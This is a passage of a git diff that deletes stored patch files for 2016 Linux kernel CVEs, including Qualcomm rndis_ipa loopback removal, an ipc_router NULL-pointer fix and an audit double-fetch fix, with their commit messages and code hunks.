RNDIS_IPA_ERROR("Fail to connect loopback"); -- return -ENODEV; -- } -- retval = rndis_ipa_pipe_connect_notify( -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl, -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl, -- BAM_DMA_DATA_FIFO_SIZE, -- 15, -- BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu, -- rndis_ipa_ctx); -- if (retval) { -- RNDIS_IPA_ERROR("connect notify fail"); -- return -ENODEV; -- } -- -- return 0; -- --} -- - static int rndis_ipa_init_module(void) - { - pr_info("RNDIS_IPA module is loaded."); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch deleted file mode 100644 index fc860b4f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch +++ /dev/null 
@@ -1,525 +0,0 @@
-From fbb765a3f813f5cc85ddab21487fd65f24bf6a8c Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi
-Date: Tue, 27 Dec 2016 13:32:35 +0200
-Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality
-
-Rndis_ipa loopback functionality at rndis_ipa driver
-is a debug functionality that is not used.
-
-Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10
-CRs-fixed: 1104431
-Signed-off-by: Ghanim Fodi
----
- drivers/net/ethernet/msm/rndis_ipa.c | 432 +----------------------------------
- 1 file changed, 1 insertion(+), 431 deletions(-)
-
-diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c
-index 15cfb1d..62e72ca 100644
---- a/drivers/net/ethernet/msm/rndis_ipa.c
-+++ b/drivers/net/ethernet/msm/rndis_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -135,29 +135,6 @@ enum rndis_ipa_operation {
- RNDIS_IPA_DEBUG("Driver state: %s\n",\
- rndis_ipa_state_string(ctx->state));
-
--/**
-- * struct rndis_loopback_pipe - hold all information needed for
-- * pipe loopback logic
-- */
--struct rndis_loopback_pipe {
-- struct sps_pipe *ipa_sps;
-- struct ipa_sps_params ipa_sps_connect;
-- struct ipa_connect_params ipa_connect_params;
--
-- struct sps_pipe *dma_sps;
-- struct sps_connect dma_connect;
--
-- struct sps_alloc_dma_chan dst_alloc;
-- struct sps_dma_chan ipa_sps_channel;
-- enum sps_mode mode;
-- u32 ipa_peer_bam_hdl;
-- u32 peer_pipe_index;
-- u32 ipa_drv_ep_hdl;
-- u32 ipa_pipe_index;
-- enum ipa_client_type ipa_client;
-- ipa_notify_cb ipa_callback;
-- struct ipa_ep_cfg *ipa_ep_cfg;
--};
-
- /**
- * struct rndis_ipa_dev - main driver context parameters
-@@ -172,13 +149,9 @@ struct rndis_loopback_pipe {
- * @rx_dump_enable: dump all Rx packets
- * @icmp_filter: allow all ICMP packet to pass through the filters
- * @rm_enable: flag that enable/disable Resource manager request prior to Tx
-- * @loopback_enable: flag that enable/disable USB stub loopback
- * @deaggregation_enable: enable/disable IPA HW deaggregation logic
- * @during_xmit_error: flags that indicate that the driver is in a middle
- * of error handling in Tx path
-- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback
-- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback
-- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic
- * @directory: holds all debug flags used by the driver to allow cleanup
- * for driver unload
- * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table
-@@ -208,12 +181,8 @@ struct rndis_ipa_dev {
- bool rx_dump_enable;
- bool icmp_filter;
- bool rm_enable;
-- bool loopback_enable;
- bool deaggregation_enable;
- bool during_xmit_error;
-- struct rndis_loopback_pipe usb_to_ipa_loopback_pipe;
-- struct rndis_loopback_pipe ipa_to_usb_loopback_pipe;
-- u32 bam_dma_hdl;
- struct dentry *directory;
- uint32_t eth_ipv4_hdr_hdl;
- uint32_t eth_ipv6_hdr_hdl;
-@@ -277,31 +246,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx);
- static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx);
- static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb,
- struct net_device *net);
--static int rndis_ipa_loopback_pipe_create(
-- struct rndis_ipa_dev *rndis_ipa_ctx,
-- struct rndis_loopback_pipe *loopback_pipe);
--static void rndis_ipa_destroy_loopback_pipe(
-- struct rndis_loopback_pipe *loopback_pipe);
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_setup_loopback(bool enable,
-- struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
-- struct file *file);
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode,
- struct file *file);
- static int rndis_ipa_debugfs_aggr_open(struct inode *inode,
- struct file *file);
- static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
-- const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
-- const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
-- char __user *ubuf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
-- char __user *ubuf, size_t count, loff_t *ppos);
- static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- char __user *ubuf, size_t count, loff_t *ppos);
- static void rndis_ipa_dump_skb(struct sk_buff *skb);
-@@ -336,12 +286,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = {
- .read = rndis_ipa_debugfs_atomic_read,
- };
-
--const struct file_operations rndis_ipa_loopback_ops = {
-- .open = rndis_ipa_debugfs_loopback_open,
-- .read = rndis_ipa_debugfs_loopback_read,
-- .write = rndis_ipa_debugfs_loopback_write,
--};
--
- const struct file_operations rndis_ipa_aggr_ops = {
- .open = rndis_ipa_debugfs_aggr_open,
- .write = rndis_ipa_debugfs_aggr_write,
-@@ -2195,14 +2139,6 @@ static int rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx)
- goto fail_file;
- }
-
-- file = debugfs_create_file("loopback_enable", flags_read_write,
-- rndis_ipa_ctx->directory,
-- rndis_ipa_ctx, &rndis_ipa_loopback_ops);
-- if (!file) {
-- RNDIS_IPA_ERROR("could not create outstanding file\n");
-- goto fail_file;
-- }
--
- file = debugfs_create_u8("state", flags_read_only,
- rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state);
- if (!file) {
-@@ -2358,59 +2294,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- return count;
- }
-
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
-- struct file *file)
--{
-- struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
-- file->private_data = rndis_ipa_ctx;
--
-- return 0;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
-- char __user *ubuf, size_t count, loff_t *ppos)
--{
-- int cnt;
-- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--
-- file->private_data = &rndis_ipa_ctx->loopback_enable;
--
-- cnt = rndis_ipa_debugfs_enable_read(file,
-- ubuf, count, ppos);
--
-- return cnt;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
-- const char __user *buf, size_t count, loff_t *ppos)
--{
-- int retval;
-- int cnt;
-- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
-- bool old_state = rndis_ipa_ctx->loopback_enable;
--
-- file->private_data = &rndis_ipa_ctx->loopback_enable;
--
-- cnt = rndis_ipa_debugfs_enable_write(file,
-- buf, count, ppos);
--
-- RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n",
-- old_state, rndis_ipa_ctx->loopback_enable);
--
-- if (old_state == rndis_ipa_ctx->loopback_enable) {
-- RNDIS_IPA_ERROR("NOP - same state\n");
-- return cnt;
-- }
--
-- retval = rndis_ipa_setup_loopback(
-- rndis_ipa_ctx->loopback_enable,
-- rndis_ipa_ctx);
-- if (retval)
-- rndis_ipa_ctx->loopback_enable = old_state;
--
-- return cnt;
--}
--
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file)
- {
- struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
-@@ -2441,319 +2324,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes);
- }
-
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
-- char __user *ubuf, size_t count, loff_t *ppos)
--{
-- int nbytes;
-- int size = 0;
-- int ret;
-- loff_t pos;
-- u8 enable_str[sizeof(char)*3] = {0};
-- bool *enable = file->private_data;
-- pos = *ppos;
-- nbytes = scnprintf(enable_str, sizeof(enable_str), "%d\n", *enable);
-- ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes);
-- if (ret < 0) {
-- RNDIS_IPA_ERROR("simple_read_from_buffer problem\n");
-- return ret;
-- }
-- size += ret;
-- count -= nbytes;
-- *ppos = pos + size;
-- return size;
--}
--
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
-- const char __user *buf, size_t count, loff_t *ppos)
--{
-- unsigned long missing;
-- char input;
-- bool *enable = file->private_data;
-- if (count != sizeof(input) + 1) {
-- RNDIS_IPA_ERROR("wrong input length(%zd)\n", count);
-- return -EINVAL;
-- }
-- if (!buf) {
-- RNDIS_IPA_ERROR("Bad argument\n");
-- return -EINVAL;
-- }
-- missing = copy_from_user(&input, buf, 1);
-- if (missing)
-- return -EFAULT;
-- RNDIS_IPA_DEBUG("input received %c\n", input);
-- *enable = input - '0';
-- RNDIS_IPA_DEBUG("value was set to %d\n", *enable);
-- return count;
--}
--
--/**
-- * Connects IPA->BAMDMA
-- * This shall simulate the path from IPA to USB
-- * Allowing the driver TX path
-- */
--static int rndis_ipa_loopback_pipe_create(
-- struct rndis_ipa_dev *rndis_ipa_ctx,
-- struct rndis_loopback_pipe *loopback_pipe)
--{
-- int retval;
--
-- RNDIS_IPA_LOG_ENTRY();
--
-- /* SPS pipe has two side handshake
-- * This is the first handshake of IPA->BAMDMA,
-- * This is the IPA side
-- */
-- loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client;
-- loopback_pipe->ipa_connect_params.client_bam_hdl =
-- rndis_ipa_ctx->bam_dma_hdl;
-- loopback_pipe->ipa_connect_params.client_ep_idx =
-- loopback_pipe->peer_pipe_index;
-- loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE;
-- loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE;
-- loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback;
-- loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx;
-- loopback_pipe->ipa_connect_params.ipa_ep_cfg =
-- *(loopback_pipe->ipa_ep_cfg);
--
-- /* loopback_pipe->ipa_sps_connect is out param */
-- retval = ipa_connect(&loopback_pipe->ipa_connect_params,
-- &loopback_pipe->ipa_sps_connect,
-- &loopback_pipe->ipa_drv_ep_hdl);
-- if (retval) {
-- RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval);
-- return retval;
-- }
-- RNDIS_IPA_DEBUG("ipa_connect() succeeded, ipa_drv_ep_hdl=%d",
-- loopback_pipe->ipa_drv_ep_hdl);
--
-- /* SPS pipe has two side handshake
-- * This is the second handshake of IPA->BAMDMA,
-- * This is the BAMDMA side
-- */
-- loopback_pipe->dma_sps = sps_alloc_endpoint();
-- if (!loopback_pipe->dma_sps) {
-- RNDIS_IPA_ERROR("sps_alloc_endpoint() failed ");
-- retval = -ENOMEM;
-- goto fail_sps_alloc;
-- }
--
-- retval = sps_get_config(loopback_pipe->dma_sps,
-- &loopback_pipe->dma_connect);
-- if (retval) {
-- RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval);
-- goto fail_get_cfg;
-- }
--
-- /* Start setting the non IPA ep for SPS driver*/
-- loopback_pipe->dma_connect.mode = loopback_pipe->mode;
--
-- /* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */
-- if (loopback_pipe->mode == SPS_MODE_DEST) {
--
-- loopback_pipe->dma_connect.source =
-- loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
-- loopback_pipe->dma_connect.src_pipe_index =
-- loopback_pipe->ipa_sps_connect.ipa_ep_idx;
-- loopback_pipe->dma_connect.destination =
-- rndis_ipa_ctx->bam_dma_hdl;
-- loopback_pipe->dma_connect.dest_pipe_index =
-- loopback_pipe->peer_pipe_index;
--
-- /* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */
-- } else {
--
-- loopback_pipe->dma_connect.source =
-- rndis_ipa_ctx->bam_dma_hdl;
-- loopback_pipe->dma_connect.src_pipe_index =
-- loopback_pipe->peer_pipe_index;
-- loopback_pipe->dma_connect.destination =
-- loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
-- loopback_pipe->dma_connect.dest_pipe_index =
-- loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--
-- }
--
-- loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc;
-- loopback_pipe->dma_connect.data = loopback_pipe->ipa_sps_connect.data;
-- loopback_pipe->dma_connect.event_thresh = 0x10;
-- /* BAM-to-BAM */
-- loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE;
--
-- RNDIS_IPA_DEBUG("doing sps_connect() with - ");
-- RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d",
-- loopback_pipe->dma_connect.source,
-- loopback_pipe->dma_connect.src_pipe_index);
-- RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d",
-- loopback_pipe->dma_connect.destination,
-- loopback_pipe->dma_connect.dest_pipe_index);
--
-- retval = sps_connect(loopback_pipe->dma_sps,
-- &loopback_pipe->dma_connect);
-- if (retval) {
-- RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)",
-- retval);
-- goto fail_sps_connect;
-- }
--
-- RNDIS_IPA_LOG_EXIT();
--
-- return 0;
--
--fail_sps_connect:
--fail_get_cfg:
-- sps_free_endpoint(loopback_pipe->dma_sps);
--fail_sps_alloc:
-- ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl);
-- return retval;
--}
--
--static void rndis_ipa_destroy_loopback_pipe(
-- struct rndis_loopback_pipe *loopback_pipe)
--{
-- sps_disconnect(loopback_pipe->dma_sps);
-- sps_free_endpoint(loopback_pipe->dma_sps);
--}
--
--/**
-- * rndis_ipa_create_loopback() - create a BAM-DMA loopback
-- * in order to replace the USB core
-- */
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
-- /* The BAM handle should be use as
-- * source/destination in the sps_connect()
-- */
-- int retval;
--
-- RNDIS_IPA_LOG_ENTRY();
--
--
-- retval = sps_ctrl_bam_dma_clk(true);
-- if (retval) {
-- RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks");
-- return -ENODEV;
-- }
--
-- /* Get BAM handle instead of USB handle */
-- rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle();
-- if (!rndis_ipa_ctx->bam_dma_hdl) {
-- RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed");
-- return -ENODEV;
-- }
-- RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)",
-- rndis_ipa_ctx->bam_dma_hdl);
--
-- /* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client =
-- IPA_CLIENT_USB_PROD;
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index =
-- FROM_USB_TO_IPA_BAMDMA;
-- /*DMA EP mode*/
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC;
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg =
-- &usb_to_ipa_ep_cfg_deaggr_en;
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback =
-- rndis_ipa_packet_receive_notify;
-- RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)");
-- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
-- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
-- if (retval) {
-- RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe");
-- goto fail_to_usb;
-- }
-- RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)");
--
-- /* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client =
-- IPA_CLIENT_USB_CONS;
-- /*DMA EP mode*/
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST;
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg;
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index =
-- FROM_IPA_TO_USB_BAMDMA;
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback =
-- rndis_ipa_tx_complete_notify;
-- RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)");
-- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
-- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
-- if (retval) {
-- RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe");
-- goto fail_from_usb;
-- }
-- RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)");
--
-- RNDIS_IPA_LOG_EXIT();
--
-- return 0;
--
--fail_from_usb:
-- rndis_ipa_destroy_loopback_pipe(
-- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--fail_to_usb:
--
-- return retval;
--}
--
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
-- rndis_ipa_destroy_loopback_pipe(
-- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
-- rndis_ipa_destroy_loopback_pipe(
-- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
-- sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl);
-- if (sps_ctrl_bam_dma_clk(false))
-- RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks");
--}
--
--/**
-- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW
-- * (as USB pipes loopback) and notify RNDIS_IPA netdev for pipe connected
-- * @enable: flag that determines if the loopback should be created or destroyed
-- * @rndis_ipa_ctx: driver main context
-- *
-- * This function is the main loopback logic.
-- * It shall create/destory the loopback by using BAM-DMA and notify
-- * the netdev accordingly.
-- */
--static int rndis_ipa_setup_loopback(bool enable,
-- struct rndis_ipa_dev *rndis_ipa_ctx)
--{
-- int retval;
--
-- if (!enable) {
-- rndis_ipa_destroy_loopback(rndis_ipa_ctx);
-- RNDIS_IPA_DEBUG("loopback destroy done");
-- retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx);
-- if (retval) {
-- RNDIS_IPA_ERROR("connect notify fail");
-- return -ENODEV;
-- }
-- return 0;
-- }
--
-- RNDIS_IPA_DEBUG("creating loopback (instead of USB core)");
-- retval = rndis_ipa_create_loopback(rndis_ipa_ctx);
-- RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK"));
-- if (retval) {
-- RNDIS_IPA_ERROR("Fail to connect loopback");
-- return -ENODEV;
-- }
-- retval = rndis_ipa_pipe_connect_notify(
-- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl,
-- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl,
-- BAM_DMA_DATA_FIFO_SIZE,
-- 15,
-- BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu,
-- rndis_ipa_ctx);
-- if (retval) {
-- RNDIS_IPA_ERROR("connect notify fail");
-- return -ENODEV;
-- }
--
-- return 0;
--
--}
--
- static int rndis_ipa_init_module(void)
- {
- pr_info("RNDIS_IPA module is loaded.");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch
deleted file mode 100644
index c3039936..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 71fe5361cbef34e2d606b79e8936a910a3e95566 Mon Sep 17 00:00:00 2001
-From: Arun Kumar Neelakantam
-Date: Wed, 21 Sep 2016 18:34:01 +0530
-Subject: net: ipc_router: fix NULL pointer de-reference issue
-
-Fail cases of accept() system call on AF_MSM_IPC socket family causes
-NULL pointer de-reference of sock structure variable in release operation.
-
-Validate the sock structure pointer before using it in release operation.
-
-CRs-Fixed: 1068888
-Change-Id: I5637e52be59ea9504ea6ae317394bef0c28c7865
-Signed-off-by: Arun Kumar Neelakantam
----
- net/ipc_router/ipc_router_socket.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
-index 828797b..652531a 100644
---- a/net/ipc_router/ipc_router_socket.c
-+++ b/net/ipc_router/ipc_router_socket.c
-@@ -555,10 +555,18 @@ static unsigned int msm_ipc_router_poll(struct file *file,
- static int msm_ipc_router_close(struct socket *sock)
- {
- struct sock *sk = sock->sk;
-- struct msm_ipc_port *port_ptr = msm_ipc_sk_port(sk);
-+ struct msm_ipc_port *port_ptr;
- int ret;
-
-+ if (!sk)
-+ return -EINVAL;
-+
- lock_sock(sk);
-+ port_ptr = msm_ipc_sk_port(sk);
-+ if (!port_ptr) {
-+ release_sock(sk);
-+ return -EINVAL;
-+ }
- ret = msm_ipc_router_close_port(port_ptr);
- msm_ipc_unload_default_node(msm_ipc_sk(sk)->default_node_vote_info);
- release_sock(sk);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch
deleted file mode 100644
index 7b6c5bcb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch
+++ /dev/null
@@ -1,416 +0,0 @@
-From 43761473c254b45883a64441dd0bc85a42f3645c Mon Sep 17 00:00:00 2001
-From: Paul Moore
-Date: Tue, 19 Jul 2016 17:42:57 -0400
-Subject: audit: fix a double fetch in audit_log_single_execve_arg()
-
-There is a double fetch problem in audit_log_single_execve_arg()
-where we first check the execve(2) argumnets for any "bad" characters
-which would require hex encoding and then re-fetch the arguments for
-logging in the audit record[1]. Of course this leaves a window of
-opportunity for an unsavory application to munge with the data.
-
-This patch reworks things by only fetching the argument data once[2]
-into a buffer where it is scanned and logged into the audit
-records(s). In addition to fixing the double fetch, this patch
-improves on the original code in a few other ways: better handling
-of large arguments which require encoding, stricter record length
-checking, and some performance improvements (completely unverified,
-but we got rid of some strlen() calls, that's got to be a good
-thing).
-
-As part of the development of this patch, I've also created a basic
-regression test for the audit-testsuite, the test can be tracked on
-GitHub at the following link:
-
- * https://github.com/linux-audit/audit-testsuite/issues/25
-
-[1] If you pay careful attention, there is actually a triple fetch
-problem due to a strnlen_user() call at the top of the function.
-
-[2] This is a tiny white lie, we do make a call to strnlen_user()
-prior to fetching the argument data. I don't like it, but due to the
-way the audit record is structured we really have no choice unless we
-copy the entire argument at once (which would require a rather
-wasteful allocation). The good news is that with this patch the
-kernel no longer relies on this strnlen_user() value for anything
-beyond recording it in the log, we also update it with a trustworthy
-value whenever possible.
-
-Reported-by: Pengfei Wang
-Cc:
-Signed-off-by: Paul Moore
----
- kernel/auditsc.c | 332 +++++++++++++++++++++++++++----------------------------
- 1 file changed, 164 insertions(+), 168 deletions(-)
-
-diff --git a/kernel/auditsc.c b/kernel/auditsc.c
-index aa3feec..c65af21 100644
---- a/kernel/auditsc.c
-+++ b/kernel/auditsc.c
-@@ -73,6 +73,7 @@
- #include
- #include
- #include
-+#include
- #include
-
- #include "audit.h"
-@@ -82,7 +83,8 @@
- #define AUDITSC_SUCCESS 1
- #define AUDITSC_FAILURE 2
-
--/* no execve audit message should be longer than this (userspace limits) */
-+/* no execve audit message should be longer than this (userspace limits),
-+ * see the note near the top of audit_log_execve_info() about this value */
- #define MAX_EXECVE_AUDIT_LEN 7500
-
- /* max length to print of cmdline/proctitle value during audit */
-@@ -992,184 +994,178 @@ static int audit_log_pid_context(struct audit_context *context, pid_t pid,
- return rc;
- }
-
--/*
-- * to_send and len_sent accounting are very loose estimates. We aren't
-- * really worried about a hard cap to MAX_EXECVE_AUDIT_LEN so much as being
-- * within about 500 bytes (next page boundary)
-- *
-- * why snprintf? an int is up to 12 digits long. if we just assumed when
-- * logging that a[%d]= was going to be 16 characters long we would be wasting
-- * space in every audit message. In one 7500 byte message we can log up to
-- * about 1000 min size arguments. That comes down to about 50% waste of space
-- * if we didn't do the snprintf to find out how long arg_num_len was.
-- */
--static int audit_log_single_execve_arg(struct audit_context *context,
-- struct audit_buffer **ab,
-- int arg_num,
-- size_t *len_sent,
-- const char __user *p,
-- char *buf)
-+static void audit_log_execve_info(struct audit_context *context,
-+ struct audit_buffer **ab)
- {
-- char arg_num_len_buf[12];
-- const char __user *tmp_p = p;
-- /* how many digits are in arg_num? 5 is the length of ' a=""' */
-- size_t arg_num_len = snprintf(arg_num_len_buf, 12, "%d", arg_num) + 5;
-- size_t len, len_left, to_send;
-- size_t max_execve_audit_len = MAX_EXECVE_AUDIT_LEN;
-- unsigned int i, has_cntl = 0, too_long = 0;
-- int ret;
--
-- /* strnlen_user includes the null we don't want to send */
-- len_left = len = strnlen_user(p, MAX_ARG_STRLEN) - 1;
--
-- /*
-- * We just created this mm, if we can't find the strings
-- * we just copied into it something is _very_ wrong. Similar
-- * for strings that are too long, we should not have created
-- * any.
-- */
-- if (WARN_ON_ONCE(len < 0 || len > MAX_ARG_STRLEN - 1)) {
-- send_sig(SIGKILL, current, 0);
-- return -1;
-+ long len_max;
-+ long len_rem;
-+ long len_full;
-+ long len_buf;
-+ long len_abuf;
-+ long len_tmp;
-+ bool require_data;
-+ bool encode;
-+ unsigned int iter;
-+ unsigned int arg;
-+ char *buf_head;
-+ char *buf;
-+ const char __user *p = (const char __user *)current->mm->arg_start;
-+
-+ /* NOTE: this buffer needs to be large enough to hold all the non-arg
-+ * data we put in the audit record for this argument (see the
-+ * code below) ... at this point in time 96 is plenty */
-+ char abuf[96];
-+
-+ /* NOTE: we set MAX_EXECVE_AUDIT_LEN to a rather arbitrary limit, the
-+ * current value of 7500 is not as important as the fact that it
-+ * is less than 8k, a setting of 7500 gives us plenty of wiggle
-+ * room if we go over a little bit in the logging below */
-+ WARN_ON_ONCE(MAX_EXECVE_AUDIT_LEN > 7500);
-+ len_max = MAX_EXECVE_AUDIT_LEN;
-+
-+ /* scratch buffer to hold the userspace args */
-+ buf_head = kmalloc(MAX_EXECVE_AUDIT_LEN + 1, GFP_KERNEL);
-+ if (!buf_head) {
-+ audit_panic("out of memory for argv string");
-+ return;
- }
-+ buf = buf_head;
-
-- /* walk the whole argument looking for non-ascii chars */
-+ audit_log_format(*ab, "argc=%d", context->execve.argc);
-+
-+ len_rem = len_max;
-+ len_buf = 0;
-+ len_full = 0;
-+ require_data = true;
-+ encode = false;
-+ iter = 0;
-+ arg = 0;
- do {
-- if (len_left > MAX_EXECVE_AUDIT_LEN)
-- to_send = MAX_EXECVE_AUDIT_LEN;
-- else
-- to_send = len_left;
-- ret = copy_from_user(buf, tmp_p, to_send);
-- /*
-- * There is no reason for this copy to be short. We just
-- * copied them here, and the mm hasn't been exposed to user-
-- * space yet.
-- */
-- if (ret) {
-- WARN_ON(1);
-- send_sig(SIGKILL, current, 0);
-- return -1;
-- }
-- buf[to_send] = '\0';
-- has_cntl = audit_string_contains_control(buf, to_send);
-- if (has_cntl) {
-- /*
-- * hex messages get logged as 2 bytes, so we can only
-- * send half as much in each message
-- */
-- max_execve_audit_len = MAX_EXECVE_AUDIT_LEN / 2;
-- break;
-- }
-- len_left -= to_send;
-- tmp_p += to_send;
-- } while (len_left > 0);
--
-- len_left = len;
--
-- if (len > max_execve_audit_len)
-- too_long = 1;
--
-- /* rewalk the argument actually logging the message */
-- for (i = 0; len_left > 0; i++) {
-- int room_left;
--
-- if (len_left > max_execve_audit_len)
-- to_send = max_execve_audit_len;
-- else
-- to_send = len_left;
--
-- /* do we have space left to send this argument in this ab? */
-- room_left = MAX_EXECVE_AUDIT_LEN - arg_num_len - *len_sent;
-- if (has_cntl)
-- room_left -= (to_send * 2);
-- else
-- room_left -= to_send;
-- if (room_left < 0) {
-- *len_sent = 0;
-- audit_log_end(*ab);
-- *ab = audit_log_start(context, GFP_KERNEL, AUDIT_EXECVE);
-- if (!*ab)
-- return 0;
